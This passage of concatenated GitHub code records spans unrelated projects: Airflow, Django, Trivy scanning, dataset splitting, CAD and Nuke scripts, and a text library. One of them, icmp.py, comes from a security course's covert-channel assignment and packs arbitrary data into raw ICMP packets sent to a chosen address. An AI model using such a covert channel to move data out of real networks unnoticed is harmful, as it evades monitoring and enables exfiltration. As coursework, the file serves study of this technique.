funcF(string):\n tmp = collections.Counter(string)\n first = sorted(list(tmp.keys()))\n\n return tmp[first[0]]\n\n q = [funcF(x) for x in queries]\n w = [funcF(w) for w in words]\n ret = []\n for query in q:\n cnt = 0\n for word in w:\n if query < word:\n cnt += 1\n ret.append(cnt)\n return ret\n\n\n\nif __name__ == \"__main__\":\n queries =[\"bba\",\"abaaaaaa\",\"aaaaaa\",\"bbabbabaab\",\"aba\",\"aa\",\"baab\",\"bbbbbb\",\"aab\",\"bbabbaabb\"]\n words = [\"aaabbb\",\"aab\",\"babbab\",\"babbbb\",\"b\",\"bbbbbbbbab\",\"a\",\"bbbbbbbbbb\",\"baaabbaab\",\"aa\"]\n print(numSmallerByFrequency(queries, words))\n","repo_name":"RioAraki/leetcode2020","sub_path":"leetcode_python/1170_CompareStringsbyFrequencyoftheSmallestCharacter.py","file_name":"1170_CompareStringsbyFrequencyoftheSmallestCharacter.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"43235474829","text":"import json\nimport click\n\nfrom os.path import join, isdir\nfrom os import makedirs\n\nfrom experiment.train_test import train_test\nfrom utilities.repro import set_seed\n\n\n@click.command()\n@click.argument('settings_fpath', type=click.Path(exists=True))\n@click.argument('seed', type=int)\ndef run(settings_fpath, seed):\n with open(settings_fpath) as j_file:\n settings = json.load(j_file)\n\n set_seed(seed)\n output_dir = join(settings['output_dir'])\n if not isdir(output_dir):\n makedirs(output_dir)\n\n train_test(settings['data_dir'],\n output_dir,\n settings['trans_parameters'],\n settings['train_parameters'],\n settings['device'],\n seed=seed)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"dstrohmaier/contrafactives_grid_world","sub_path":"run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26514184748","text":"import os\nimport requests\n\nfrom airflow import DAG\nfrom airflow.contrib.operators.slack_webhook_operator import SlackWebhookOperator\n\nfrom datetime import datetime\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2023, 3, 1),\n 'retries': 0,\n}\n# https://api.slack.com/messaging/webhooks\n# https://towardsdatascience.com/integrating-docker-airflow-with-slack-to-get-daily-reporting-c462e7c8828a#:~:text=The%20Slack%20Webhook%20Operator%20can,some%20trigger%20condition%20is%20met.\nAPI = \"https://api.open-meteo.com/v1/forecast?latitude=19.43&longitude=-99.13&hourly=temperature_2m\"\n\n\ndef get_daily_forecast() -> str:\n forecast = requests.get(API).json()['hourly']['temperature_2m'][7]\n time = requests.get(API).json()['hourly']['time'][7].split('T')[1]\n return f'La predicción de la temperatura en la Ciudad de México a las {time} es de: {forecast} °C'\n\nwith DAG(\n dag_id='prueba_slack_webhook',\n default_args=default_args,\n start_date = datetime(2023, 3, 1),\n schedule='@daily',\n catchup=False,\n) as dag:\n post_daily_forecast = SlackWebhookOperator(\n task_id='post_daily_forecast',\n http_conn_id='slack_connection',\n message=get_daily_forecast()\n )\n","repo_name":"beduExpert/Airflow-Fundamentals","sub_path":"Sesion-06/Ejemplo-02/assets/dags/s06_e02_webhook_slack.py","file_name":"s06_e02_webhook_slack.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37419638435","text":"from rest_framework.response import 
Response\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\nfrom rest_framework.decorators import api_view, permission_classes\nfrom .models import Employee\nfrom .models import Paycheck\nfrom .serializers import PaycheckSerializer\nfrom django.shortcuts import get_object_or_404\n\n\n#@api_view(['GET'])\n#@permission_classes([IsAuthenticated])\n#def paycheck_home(request, fk):\n #paycheck = get_object_or_404(Paycheck, fk=fk)\n #serializer = PaycheckSerializer(paycheck)\n #return Response(serializer.data)\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef paycheck_display(request, pk):\n paycheck = get_object_or_404(Paycheck, pk=pk)\n serializer = PaycheckSerializer(paycheck)\n return Response(serializer.data)\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get__all_paychecks_for_employee(request, employee_id):\n paychecks = Paycheck.objects.filter(employee_id=employee_id)\n if request.method == 'GET':\n serializer = PaycheckSerializer(paychecks, many=True)\n return Response(serializer.data)\n\n@api_view(['POST'])\n@permission_classes([IsAdminUser])\ndef create_paycheck(request):\n if request.method == 'POST':\n serializer = PaycheckSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n@api_view(['PUT', 'DELETE'])\n@permission_classes([IsAdminUser])\ndef edit_delete_paycheck(request, pk):\n paycheck = get_object_or_404(Paycheck, pk=pk)\n if request.method == 'PUT':\n serializer = PaycheckSerializer(paycheck, data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data)\n elif request.method == 'DELETE':\n paycheck.delete()\n return Response(status = status.HTTP_204_NO_CONTENT)","repo_name":"alexanderjtaylor/workforce_services","sub_path":"backend/paychecks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"5306722399","text":"#Inspiration taken from https://github.com/ValentinBELYN/icmplib/blob/454e4c37617e2ea892b2e07df024c3c401d4b29b/icmplib/sockets.py#L125\nfrom struct import pack, unpack\nimport socket\nfrom sys import platform\n\nPLATFORM_LINUX = platform == 'linux'\nPLATFORM_MACOS = platform == 'darwin'\nPLATFORM_WINDOWS = platform == 'win32'\n\nICMP_HEADER_CODE = 47\nICMP_CODE = socket.getprotobyname('icmp')\nICMP_MAX_PAYLOAD_SIZE = 65507\n\n_ICMP_HEADER_OFFSET = 20\n_ICMP_HEADER_REAL_OFFSET = 20\n\n_ICMP_CHECKSUM_OFFSET = _ICMP_HEADER_OFFSET + 2\n_ICMP_PAYLOAD_OFFSET = _ICMP_HEADER_OFFSET + 8\n\n_ICMP_ECHO_REPLY = 0\n\ndef calc_checksum(data):\n sum = 0\n data += b'\\x00'\n\n for i in range(0, len(data) - 1, 2):\n sum += (data[i] << 8) + data[i + 1]\n sum = (sum & 0xffff) + (sum >> 16)\n\n sum = ~sum & 0xffff\n\n return sum\n\ndef create_packet(id, sequence, data: bytes):\n checksum = 0\n header = pack('!2B3H', ICMP_CODE, ICMP_HEADER_CODE, checksum, id, sequence)\n checksum = calc_checksum(header + data)\n header = pack('!2B3H', ICMP_CODE, ICMP_HEADER_CODE, checksum, id, sequence)\n return header + data\n\ndef send(s: socket.socket, dest_addr, data):\n for i in range(int(((len(data)/ICMP_MAX_PAYLOAD_SIZE)+0.5)) + 1):\n packet = create_packet(\n id=1,\n sequence=i,\n data=data)\n s.sendto(packet, (dest_addr, 0))\n\ndef receive(s: socket.socket) 
-> tuple():\n packet, addr = s.recvfrom(1024)\n if PLATFORM_LINUX:\n packet = b'\\x00' * _ICMP_HEADER_OFFSET + packet\n\n if len(packet) < _ICMP_CHECKSUM_OFFSET:\n return None\n\n type, code = unpack('!2B', packet[\n _ICMP_HEADER_OFFSET:\n _ICMP_CHECKSUM_OFFSET])\n\n if type != _ICMP_ECHO_REPLY:\n packet = packet[\n _ICMP_PAYLOAD_OFFSET\n - _ICMP_HEADER_OFFSET\n + _ICMP_HEADER_REAL_OFFSET:]\n\n if len(packet) < _ICMP_PAYLOAD_OFFSET:\n return None\n return (packet, addr)","repo_name":"mlRosenquist/au-syssec-e21-grp8-assignments","sub_path":"assignment-2/encrypted-covert-channel/icmp.py","file_name":"icmp.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36416604589","text":"\nfrom flask_script import Manager, Server, Shell\nfrom flask_migrate import Migrate, MigrateCommand\nfrom app import create_app, db\nfrom app.models import User, Role, Subscriber, BlogPost, Category, Comment\n\n# Creating app instance\napp = create_app('default')\n# app = create_app('test')\n# app = create_app('production')\nmanager = Manager(app)\nmigrate = Migrate(app, db)\n\nmanager.add_command('db', MigrateCommand)\nmanager.add_command('server', Server)\n\n\n@manager.shell\ndef make_shell_context():\n return dict(app=app, db=db, User=User, Role=Role, Subscriber=Subscriber, BlogPost=BlogPost, Category=Category, Comment=Comment)\n\n\nif __name__ == '__main__':\n manager.run()\n","repo_name":"sami-mai/Mai-Blog","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26954744964","text":"def search(str_to_find, main_txt):\n pattern_found = 0\n\n for i in range(len(main_txt) - len(str_to_find) + 1):\n if txt[i:i + len(str_to_find)] == str_to_find:\n print(\"\\nPattern Found at Index\", i)\n print(\"\\t\" + txt[:i] + \"\\033[93m\" + \"\\033[1m\" + txt[i:i + len(str_to_find)] + \"\\033[0m\" + txt[i + len(str_to_find):])\n pattern_found += 1\n\n else:\n if pattern_found == 0:\n print(\"\\nPattern not Found\")\n\n\nif __name__ == '__main__':\n\n txt = input(\"Enter the main text : \")\n str_2_find = input(\"Enter the string you want to find : \")\n\n print('\\nYou want to find \"{str}\" from \"{text}\" !'.format(str=str_2_find, text=txt))\n\n search(str_2_find, txt)\n","repo_name":"mhpanchal/Mini-Projcects","sub_path":"String Matching/str_match.py","file_name":"str_match.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71122645211","text":"import os, glob, shutil, sys\nfrom concurrent.futures import ThreadPoolExecutor\n\nimages_directory = input(\"Images directory: \")\nlabels_directory = input(\"Labels directory: \")\noutput_directory = input(\"Output directory: \")\ntrain_percentage = 0.7\ntest_percentage = 0.2\nvalid_percentage = 0.1\n\nif not os.path.exists(images_directory):\n print(\"Images directory does not exist!\")\n sys.exit()\nif not os.path.exists(labels_directory):\n print(\"Labels directory does not exist!\")\n sys.exit()\nif not os.path.exists(os.path.join(output_directory)):\n os.mkdir(os.path.join(output_directory))\n\nimages = glob.glob(os.path.normpath(os.path.join(images_directory, \"*.jpg\")))\ncount = len(images)\n\ndef collect(iterList):\n labeled_images = []\n while len(iterList) > 0:\n image_file = iterList.pop(0)\n text_file = 
os.path.normpath(os.path.join(labels_directory, \".\".join([os.path.splitext(os.path.basename(image_file))[0], \"txt\"])))\n if os.path.exists(text_file):\n labeled_images.append({\n \"image\": image_file,\n \"text\": text_file\n })\n else:\n print(f\"'{text_file}' not found\")\n return labeled_images\n\ndef split(iterList, *percentages):\n countList = []\n for percentage in percentages:\n count = round(len(iterList)*percentage)\n countList.append(count)\n split_result = []\n for index in range(len(countList)):\n piece = []\n while countList[index] > 0:\n piece.append(iterList.pop(0))\n countList[index] -= 1\n split_result.append(piece)\n return split_result\n\nimages = collect(images)\nprint(\"-\"*30)\nprint(f\"original total images: {len(images)}\")\ntrain, test, valid = split(images, train_percentage, test_percentage, valid_percentage)\nprint(\"-\"*30)\nprint(f\"train ({train_percentage*100}%): {len(train)}\")\nprint(f\"test ({test_percentage*100}%): {len(test)}\")\nprint(f\"valid ({valid_percentage*100}%): {len(valid)}\")\nprint(f\"total (100%): {len(train)+len(test)+len(valid)}\")\nprint(\"-\"*30)\n\ndef copyTo(iterList, dir_name):\n total = 0\n if not os.path.exists(os.path.join(output_directory, dir_name)):\n os.mkdir(os.path.join(output_directory, dir_name))\n os.mkdir(os.path.join(output_directory, dir_name, \"images\"))\n os.mkdir(os.path.join(output_directory, dir_name, \"labels\"))\n if not os.path.exists(os.path.join(output_directory, dir_name)):\n os.mkdir(os.path.join(output_directory, dir_name))\n if not os.path.exists(os.path.join(output_directory, dir_name, \"images\")):\n os.mkdir(os.path.join(output_directory, dir_name, \"images\"))\n if not os.path.exists(os.path.join(output_directory, dir_name, \"labels\")):\n os.mkdir(os.path.join(output_directory, dir_name, \"labels\"))\n while len(iterList) > 0:\n labeled_image = iterList.pop()\n basename_image = os.path.basename(labeled_image[\"image\"])\n basename_text = os.path.basename(labeled_image[\"text\"])\n dest_image = os.path.normpath(os.path.join(output_directory, dir_name, \"images\", basename_image))\n dest_text = os.path.normpath(os.path.join(output_directory, dir_name, \"labels\", basename_text))\n shutil.copy2(labeled_image[\"image\"], dest_image)\n shutil.copy2(labeled_image[\"text\"], dest_text)\n print(f\"{labeled_image} done.\")\n total += 1\n return total\n\nexecutor = ThreadPoolExecutor(max_workers=3)\nfuture1 = executor.submit(copyTo, train, \"train\")\nfuture2 = executor.submit(copyTo, test, \"test\")\nfuture3 = executor.submit(copyTo, valid, \"valid\")\ntotal = future1.result()+future2.result()+future3.result()","repo_name":"zEuS0390/python-based-yolo-dataset-tools","sub_path":"train_test_split_dataset.py","file_name":"train_test_split_dataset.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26280523280","text":"\"\"\"Doorman\"\"\"\n\n# doorman\n\nmax_diff = int(input())\nline = list(input()[::-1])\n\ncounts = {\"W\": 0, \"M\": 0}\nwaiting = None\n\nwhile line:\n next_one = line.pop()\n if abs(counts[\"W\"] - counts[\"M\"]) == max_diff:\n counts[next_one] += 1\n if abs(counts[\"W\"] - counts[\"M\"]) > max_diff:\n counts[next_one] -= 1\n if waiting is not None:\n break\n waiting = next_one\n else:\n if waiting is not None:\n line.append(waiting)\n waiting = None\n else:\n counts[next_one] += 
1\n\nprint(sum(counts.values()))\n","repo_name":"lukaszlukaszew/kattis-solutions","sub_path":"D/doorman.py","file_name":"doorman.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12284706142","text":"from django.urls import path\nfrom .views import (\n NoteBookListView,\n NoteBookDetailView,\n NoteListView,\n NoteDetailView,\n TagListView,\n)\n\n\nurlpatterns = [\n path(\"notebooks/\", NoteBookListView.as_view(), name=\"notebook_list_url\"),\n path(\"notebook//\", NoteBookDetailView.as_view(), name=\"notebook_detail_url\"),\n path(\"notebook//notes/\", NoteListView.as_view(), name=\"note_list_url\"),\n path(\"note/\", NoteDetailView.as_view(), name=\"note_detail_url\"),\n path(\"tag/\", TagListView.as_view(), name=\"tag_list_url\"),\n]\n","repo_name":"w44121/rest_notebook","sub_path":"src/notebook/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73533651930","text":"from cv2 import VideoCapture, destroyAllWindows, CAP_V4L2, flip, FILLED, circle, imshow\nimport numpy as np\nfrom autopy import screen, mouse as Amouse\nfrom services import handTrackingModule as htm\nimport os\nfrom datetime import datetime, timedelta\nimport sys\n\nclass Mouse:\n\n def __init__(self):\n self.cap = VideoCapture(0)\n self.wScr, self.hScr = screen.size()\n self.wCam = 640\n self.hCam = 480\n self.frameR = 150\n self.smootheing = 5\n self.plocX = 0\n self.plocY = 0\n self.clocX = 0\n self.clocY = 0\n self.detector = htm.HandDetector()\n\n def Mouse(self, img):\n \n # finding hands\n self.detector.findhands(img)\n lmlist, bbox = self.detector.findPosition(img)\n\n # 2. get the tip of index and midel finger\n if len(lmlist) != 0:\n Xindex, Yindex = lmlist[8][1], lmlist[8][2]\n Xmidel, Ymidel = lmlist[12][1], lmlist[12][2]\n # 3. check which one is up?\n fingers = self.detector.fingersUp()\n # 4. index: moving mode\n if fingers[1] == 1 and fingers[2] == 0:\n # 5. cordinates the position (cam :640*480) to (screen :2560 × 1600)\n xMOUSE = np.interp(Xindex, [self.frameR, self.wCam - self.frameR], [0, self.wScr])\n yMOUSE = np.interp(Yindex, (self.frameR, self.hCam - self.frameR), (0, self.hScr))\n \n # 6. smoothen value\n self.clocX = self.plocX + (xMOUSE - self.plocX) / self.smootheing\n self.clocY = self.plocY + (yMOUSE - self.plocY) / self.smootheing\n # 7. move mouse\n Amouse.move(self.clocX, self.clocY)\n\n circle(img, (Xindex, Yindex), 15, (20, 180, 90), FILLED)\n self.plocY, self.plocX = self.clocY, self.clocX\n # 8. both are up : cliking mode\n if fingers[1] == 1 and fingers[2] == 1:\n # 9. finding distance\n length, bbox = self.detector.findDistance(8, 12, img)\n # 10. 
click if distance was short\n if length < 40:\n Amouse.click()\n return img\n\n\n def main(self):\n if self.cap.isOpened():\n self.cap.set(3, self.wCam)\n self.cap.set(4, self.hCam)\n while True:\n sucess, img = self.cap.read()\n img = flip(img, 1)\n img = self.Mouse(img)\n else:\n return \"Pas de cam\"\n\n def stop(self):\n self.cap.release()\n self.cap = None\n destroyAllWindows()\n\n def __del__(self):\n print(\"vm killed\")\n \n","repo_name":"gravity-zero/Mirori_FR","sub_path":"identification/services/virtualmouse.py","file_name":"virtualmouse.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70973938010","text":"import json\nimport tempfile\nfrom subprocess import PIPE, Popen\nfrom typing import Optional\n\nfrom hoppr_cyclonedx_models.cyclonedx_1_4 import (\n CyclonedxSoftwareBillOfMaterialsStandard as Bom_1_4,\n)\nfrom hoppr_cyclonedx_models.cyclonedx_1_4 import Vulnerability, Tool\nfrom packageurl import PackageURL\n\nfrom security_commons.common.utils import (\n build_bom_from_purls,\n)\nfrom security_commons.common.vulnerability_scanner import VulnerabilitySuper\n\n\nclass TrivyScanner(VulnerabilitySuper):\n \"\"\" \"Interacts with the trivy cli to scan an sbom\"\"\"\n\n required_tools_on_path = [\"trivy\"]\n supported_types = [\"npm\", \"maven\", \"pypi\", \"gem\", \"golang\", \"nuget\", \"connan\"]\n\n def get_vulnerabilities_by_purl(\n self, purls: list[PackageURL]\n ) -> dict[str, Optional[list[Vulnerability]]]:\n \"\"\"Get the vulnerabilities for a list of package URLS (purls)\n This function will return a dictionary of package URL to vulnerabilities or none if no vulnerabilities are found\n \"\"\"\n results = {}\n for purl in purls:\n results[purl.to_string()] = []\n\n purls = list(filter(lambda x: x.type in self.supported_types, purls))\n if len(purls) > 0:\n bom = build_bom_from_purls(purls)\n\n with tempfile.NamedTemporaryFile(mode=\"w\") as bom_file:\n bom_file.write(bom.json())\n\n with Popen(\n [\"trivy\", \"sbom\", \"--format\", \"cyclonedx\", str(bom_file.name)],\n stdout=PIPE,\n stdin=PIPE,\n stderr=PIPE,\n ) as process:\n stdout_data = process.communicate(input=b\"\")[0]\n bom_file.close()\n bom_dict = json.loads(stdout_data)\n bom_dict[\"metadata\"][\"component\"][\"type\"] = \"application\"\n bom_dict[\"metadata\"][\"component\"][\"name\"] = \"generated\"\n trivy_result = Bom_1_4(**bom_dict)\n\n for vuln in trivy_result.vulnerabilities:\n for affects in vuln.affects:\n _, _, purl = str(affects.ref).partition(\"#\")\n affects.ref.__root__ = purl.strip(\"'\")\n if vuln.ratings is not None:\n results[str(affects.ref.__root__)].append(vuln)\n vuln.tools = [Tool(vendor=\"Aquasec\", name=\"Trivy\")]\n\n return results\n","repo_name":"ep-infosec/27_lmco_hoppr-cop","sub_path":"hopprcop/trivy/trivy_scanner.py","file_name":"trivy_scanner.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11571979881","text":"\"\"\"treatment usage\n\nRevision ID: 123a8fca2610\nRevises: 3fdf9062540d\nCreate Date: 2021-12-28 21:45:08.918586\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '123a8fca2610'\ndown_revision = '3fdf9062540d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('treatment_usage',\n sa.Column('id', sa.BigInteger(), autoincrement=True, nullable=False),\n sa.Column('created_time', sa.DateTime(timezone=True), nullable=True),\n sa.Column('updated_time', sa.DateTime(timezone=True), nullable=True),\n sa.Column('patient_id', sa.BigInteger(), nullable=True),\n sa.Column('type', sa.String(255), nullable=False),\n sa.Column('reference_id', sa.Integer(), nullable=False),\n sa.Column('state', sa.Enum('open', 'close', name='state'), nullable=True),\n sa.Column('created_user_id', sa.BigInteger(), nullable=False),\n sa.Column('updated_user_id', sa.BigInteger(), nullable=False),\n sa.ForeignKeyConstraint(['created_user_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['patient_id'], ['patient.id'], ),\n sa.ForeignKeyConstraint(['updated_user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_treatment_usage_id'), 'treatment_usage', ['id'], unique=False)\n op.create_table('treatment_usage_item',\n sa.Column('id', sa.BigInteger(), autoincrement=True, nullable=False),\n sa.Column('created_time', sa.DateTime(timezone=True), nullable=True),\n sa.Column('updated_time', sa.DateTime(timezone=True), nullable=True),\n sa.Column('treatment_usage_id', sa.BigInteger(), nullable=True),\n sa.Column('pharmacy_item_id', sa.BigInteger(), nullable=True),\n sa.Column('inventory_id', sa.Integer(), nullable=True),\n sa.Column('quantity', sa.Integer(), nullable=True),\n sa.Column('unit', sa.String(255), nullable=True),\n sa.Column('created_user_id', sa.BigInteger(), nullable=False),\n sa.Column('updated_user_id', sa.BigInteger(), nullable=False),\n sa.ForeignKeyConstraint(['created_user_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['pharmacy_item_id'], ['pharmacy_item.id'], ),\n sa.ForeignKeyConstraint(['treatment_usage_id'], ['treatment_usage.id'], ),\n sa.ForeignKeyConstraint(['updated_user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_treatment_usage_item_id'), 'treatment_usage_item', ['id'], unique=False)\n \n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n \n op.drop_index(op.f('ix_treatment_usage_item_id'), table_name='treatment_usage_item')\n op.drop_table('treatment_usage_item')\n op.drop_index(op.f('ix_treatment_usage_id'), table_name='treatment_usage')\n op.drop_table('treatment_usage')\n # ### end Alembic commands ###\n","repo_name":"yeaung276/oner-herp","sub_path":"oner-python/src/alembic/versions/123a8fca2610_treatment_usage.py","file_name":"123a8fca2610_treatment_usage.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8536876998","text":"def Create_Shuffule_List():\n node = nuke.selectedNode()\n channels = node.channels()\n layers = list( set([c.split('.')[0] for c in channels]) )\n for layer in layers:\n shuffleNode = nuke.nodes.Shuffle( label=layer, inputs=[node] )\n shuffleNode['in'].setValue( layer )\n shuffleNode['postage_stamp'].setValue( True )\n\nnuke.menu( 'Nodes' ).addCommand( 'Other/FileOpen01', \"Create_Shuffule_List()\", 'shift+n')\n\n\n","repo_name":"shr2197/Nuke_Extract_Shuffle_Passes","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18888747507","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: LZH\n统计由Inventor导出的二维图纸量\n\"\"\"\n\n# =================\n# imports\n# =================\nimport os\nimport time\n\nimport win32com.client\n\nimport AutoPath_TypeConvert as Tc\n\n\n# =========================================================\ndef getfilefame(path):\n dwg_list = []\n for root, dirs, files in os.walk(path):\n for i in files:\n if os.path.splitext(i)[1] == '.dwg':\n j = os.path.join(root, i)\n dwg_list.append(j)\n return dwg_list\n\n\ndef change_name(f_list, wincad):\n list_amount = 0\n drawing_amount = 0\n drawing_amount0_list = []\n for i in f_list:\n list_amount += 1\n print(\"第%d张,共%d张\" % (list_amount, len(f_list)))\n name, number = None, None\n time.sleep(1)\n wincad.Documents.Open(i)\n doc = wincad.ActiveDocument\n time.sleep(0.5)\n # try:\n # doc.SelectionSets.Item(\"SS1\").Delete()\n # except:\n # pass\n # slt = doc.SelectionSets.Add(\"SS1\")\n # slt.Select(5) # 全选\n # obj = slt[0]\n # obj.move(Tc.vtpnt(0, 0), Tc.vtpnt(0, 0))\n # slt.Delete()\n\n try:\n doc.SelectionSets.Item(\"SS2\").Delete()\n except:\n pass\n slt = doc.SelectionSets.Add(\"SS2\")\n filterType = [0] # 定义过滤类型\n filterData = [\"INSERT\"] # 设置过滤参数\n filterType = Tc.vtint(filterType)\n filterData = Tc.vtvariant(filterData)\n slt.Select(5, 0, 0, filterType, filterData) # 实现过滤\n time.sleep(0.5)\n for entity in slt:\n if entity.Name == '标题栏 标题栏':\n attributes = entity.GetAttributes()\n for attri in attributes:\n if attri.TagString == '零件代号':\n if attri.TextString == '':\n break\n elif attri.TextString[0] == '\\\\':\n name = attri.TextString.split(';', 1)[1]\n else:\n name = attri.TextString\n if attri.TagString == '库存编号':\n if attri.TextString == '':\n break\n elif attri.TextString[0] == '\\\\':\n number = attri.TextString.split(';', 1)[1]\n else:\n number = attri.TextString\n break\n slt.Delete()\n doc.Close()\n if name and number:\n file_name_old = i\n file_name_new = os.path.split(i)[0] + '\\\\' + number + ' ' + name + '.dwg'\n os.rename(file_name_old, file_name_new)\n else:\n drawing_amount0_list.append(i)\n print(\"\\n以下%d张图纸未重命名,请手动进行:\" % len(drawing_amount0_list))\n for each in drawing_amount0_list:\n print(each, end=',\\n')\n\n\nif __name__ == '__main__':\n path 
= input(\"请输入要重命名的文件夹路径(默认包含所有子文件夹):\")\n # path = 'r\"' + path + '\"'\n f_list = getfilefame(path)\n print(\"共找到%d个dwg文件\" % len(f_list))\n\n wincad = win32com.client.Dispatch(\"AutoCAD.Application\")\n change_name(f_list, wincad)\n input()\n","repo_name":"Blacky-cn/pyCAD","sub_path":"Change_Name/Change_Name.py","file_name":"Change_Name.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39668317112","text":"\"\"\"\nPlane class, support chain function calls.\n\"\"\"\n\nfrom plane.func import PATTERNS, compile_regex\nfrom plane.pattern import ASCII_WORD, Token\nfrom plane.punctuation import punc\n\n\nclass Plane:\n \"\"\"\n Init :class:`Plane.text` and :class:`Plane.values` when the instance is\n created.\n \"\"\"\n\n def __init__(self):\n self._text = \"\"\n self._values = []\n\n @property\n def text(self):\n return self._text\n\n @property\n def values(self):\n return self._values\n\n def extract(self, regex, result=False):\n \"\"\"\n :param Regex regex: :class:`Regex`\n :param bool result: if `True`, return result directly\n\n Extract tokens, results is saved in :class:`Plane.values`\n \"\"\"\n regex = PATTERNS.get(regex.name, compile_regex(regex))\n values = []\n for mo in regex.finditer(self._text):\n name = mo.lastgroup\n value = mo.group(name)\n values.append(Token(name, value, mo.start(), mo.end()))\n\n if result:\n return values\n self._values.extend(values)\n return self\n\n def replace(self, regex, repl=None, result=False):\n \"\"\"\n :param Regex regex: :class:`Regex`\n :param str repl: replacement for regex, if setted, default value will \\\n be overwritten\n :param bool result: if `True`, return result directly\n\n Replace matched :class:`regex` patterns with :class:`repl`.\n \"\"\"\n repl = repl if repl is not None else regex.repl\n text, start = \"\", 0\n\n for t in self.extract(regex, result=True):\n text += self._text[start : t.start] + repl\n start = t.end\n text += self._text[start:]\n\n if result:\n return text\n self._text = text\n return self\n\n def update(self, text):\n \"\"\"\n :param str text: text string.\n\n Init `Plane.text` and `Plane.values`.\n \"\"\"\n if not isinstance(text, str):\n raise TypeError(\"Only support string.\")\n\n self._text = text\n self._values = []\n return self\n\n def segment(self, regex=ASCII_WORD):\n \"\"\"\n :param Regex regex: default regex is `ASCII_WORD`, this will keep all \\\n english words complete\n\n Segment sentence.\n Chinese words will be split into char and English words will be keeped.\n \"\"\"\n regex = PATTERNS.get(regex.name, compile_regex(regex))\n result, start = [], 0\n for t in regex.finditer(self._text):\n result.extend(\n [char for char in list(self._text[start : t.start()]) if char != \" \"]\n )\n result.append(self._text[t.start() : t.end()])\n start = t.end()\n result.extend([char for char in list(self._text[start:]) if char != \" \"])\n return result\n\n def remove_punctuation(self, repl=\" \", punc=punc):\n \"\"\"\n :param str repl: replacement for regex, if setted, default value will \\\n be overwritten\n\n remove all punctuations\n \"\"\"\n self._text = punc.remove(self._text, repl)\n return self\n\n def normalize_punctuation(self, punc=punc):\n \"\"\"\n normalize punctuations to English punctuations\n \"\"\"\n self._text = punc.normalize(self.text)\n return 
self\n","repo_name":"kemingy/Plane","sub_path":"plane/plane.py","file_name":"plane.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"73188259930","text":"import time\nfrom ccapi import EventHandler, SessionOptions, SessionConfigs, Session, Subscription, Event\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport time\n\nif __name__ == \"__main__\":\n option = SessionOptions()\n config = SessionConfigs()\n session = Session(option, config)\n exchange = \"okx\"\n instrument = \"BTC-USDT\"\n subscription = Subscription(exchange, instrument, \"MARKET_DEPTH\", \"MARKET_DEPTH_MAX=400&CONFLATE_INTERVAL_MILLISECONDS=100\")\n session.subscribe(subscription)\n fig, ax = plt.subplots()\n startTime = time.time()\n while True:\n bids = {\"price\": [], \"size\": []}\n asks = {\"price\": [], \"size\": []}\n eventList = session.getEventQueue().purge()\n if eventList:\n event = 